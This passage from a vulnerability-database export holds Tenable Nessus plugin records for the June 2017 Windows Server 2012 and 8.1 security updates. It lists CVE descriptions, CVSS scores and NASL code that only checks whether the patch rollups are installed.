logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8469,\n CVE-2017-8470, CVE-2017-8471, CVE-2017-8472,\n CVE-2017-8473, CVE-2017-8474, CVE-2017-8475,\n CVE-2017-8476, CVE-2017-8477, CVE-2017-8478,\n CVE-2017-8479, CVE-2017-8480, CVE-2017-8481,\n CVE-2017-8482, CVE-2017-8483, CVE-2017-8484,\n CVE-2017-8485, CVE-2017-8488, CVE-2017-8489,\n CVE-2017-8490, CVE-2017-8491, CVE-2017-8492)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522)\n\n - Multiple remote code execution vulnerabilities exist in\n Internet Explorer due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8519, CVE-2017-8547)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. 
(CVE-2017-8527)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)", "edition": 39, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-13T00:00:00", "title": "Windows Server 2012 June 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8484", 
"CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2017-06-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUN_4022724.NASL", "href": "https://www.tenable.com/plugins/nessus/100762", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100762);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\n \"CVE-2017-0193\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8469\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8472\",\n \"CVE-2017-8473\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8488\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8517\",\n \"CVE-2017-8519\",\n \"CVE-2017-8522\",\n \"CVE-2017-8527\",\n \"CVE-2017-8528\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8553\",\n \"CVE-2017-8554\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98842,\n 98845,\n 98847,\n 98848,\n 98849,\n 98851,\n 98852,\n 98853,\n 98854,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98864,\n 98865,\n 98867,\n 98869,\n 98870,\n 98878,\n 98884,\n 98885,\n 98887,\n 98895,\n 98899,\n 98900,\n 98901,\n 
98902,\n 98903,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98926,\n 98929,\n 98932,\n 98933,\n 98940,\n 98942,\n 98949,\n 98953\n );\n script_xref(name:\"MSKB\", value:\"4022724\");\n script_xref(name:\"MSFT\", value:\"MS17-4022724\");\n script_xref(name:\"MSKB\", value:\"4022718\");\n script_xref(name:\"MSFT\", value:\"MS17-4022718\");\n\n script_name(english:\"Windows Server 2012 June 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4022718\nor cumulative update 4022724. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document file, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - Multiple remote code execution vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. 
An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0283, CVE-2017-8528)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted \n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. 
(CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. 
(CVE-2017-8469,\n CVE-2017-8470, CVE-2017-8471, CVE-2017-8472,\n CVE-2017-8473, CVE-2017-8474, CVE-2017-8475,\n CVE-2017-8476, CVE-2017-8477, CVE-2017-8478,\n CVE-2017-8479, CVE-2017-8480, CVE-2017-8481,\n CVE-2017-8482, CVE-2017-8483, CVE-2017-8484,\n CVE-2017-8485, CVE-2017-8488, CVE-2017-8489,\n CVE-2017-8490, CVE-2017-8491, CVE-2017-8492)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522)\n\n - Multiple remote code execution vulnerabilities exist in\n Internet Explorer due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8519, CVE-2017-8547)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. 
(CVE-2017-8544)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/4022724/windows-server-update-kb4022724\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4a3cabfc\");\n # https://support.microsoft.com/en-us/help/4022718/windows-server-update-kb4022718\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fcd66520\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4022718 or Cumulative update KB4022724\nas well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-06';\nkbs = make_list(\n '4022724', # 2012 Monthly Rollup\n '4022718' # 2012 Security Rollup\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (smb_check_rollup(os:\"6.2\", sp:0, rollup_date: \"06_2017\", bulletin:bulletin, rollup_kb_list:[4022724,4022718]))\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n 
hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:44:12", "description": "The remote Windows host is missing security update 4022717\nor cumulative update 4022726. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - Multiple remote code execution vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0283, CVE-2017-8528)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. 
An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. 
An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. 
(CVE-2017-8469,\n CVE-2017-8470, CVE-2017-8471, CVE-2017-8473,\n CVE-2017-8474, CVE-2017-8475, CVE-2017-8476,\n CVE-2017-8477, CVE-2017-8478, CVE-2017-8479,\n CVE-2017-8480, CVE-2017-8481, CVE-2017-8482,\n CVE-2017-8483, CVE-2017-8484, CVE-2017-8488,\n CVE-2017-8489, CVE-2017-8490, CVE-2017-8491,\n CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. 
(CVE-2017-8553, CVE-2017-8554)", "edition": 41, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-13T00:00:00", "title": "Windows 8.1 and Windows Server 2012 R2 June 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUN_4022726.NASL", "href": "https://www.tenable.com/plugins/nessus/100764", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100764);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/07/30 15:31:34\");\n\n script_cve_id(\n \"CVE-2017-0193\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n 
\"CVE-2017-8465\",\n \"CVE-2017-8466\",\n \"CVE-2017-8468\",\n \"CVE-2017-8469\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8473\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8488\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n \"CVE-2017-8527\",\n \"CVE-2017-8528\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8553\",\n \"CVE-2017-8554\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98842,\n 98843,\n 98844,\n 98845,\n 98846,\n 98847,\n 98848,\n 98849,\n 98850,\n 98852,\n 98853,\n 98854,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98864,\n 98865,\n 98867,\n 98869,\n 98870,\n 98878,\n 98884,\n 98885,\n 98887,\n 98900,\n 98901,\n 98902,\n 98903,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98929,\n 98933,\n 98940,\n 98942,\n 98949\n );\n\n script_xref(name:\"MSKB\", value:\"4022717\");\n script_xref(name:\"MSFT\", value:\"MS17-4022717\");\n script_xref(name:\"MSKB\", value:\"4022726\");\n script_xref(name:\"MSFT\", value:\"MS17-4022726\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 June 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4022717\nor cumulative update 4022726. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - Multiple remote code execution vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0283, CVE-2017-8528)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. 
(CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. 
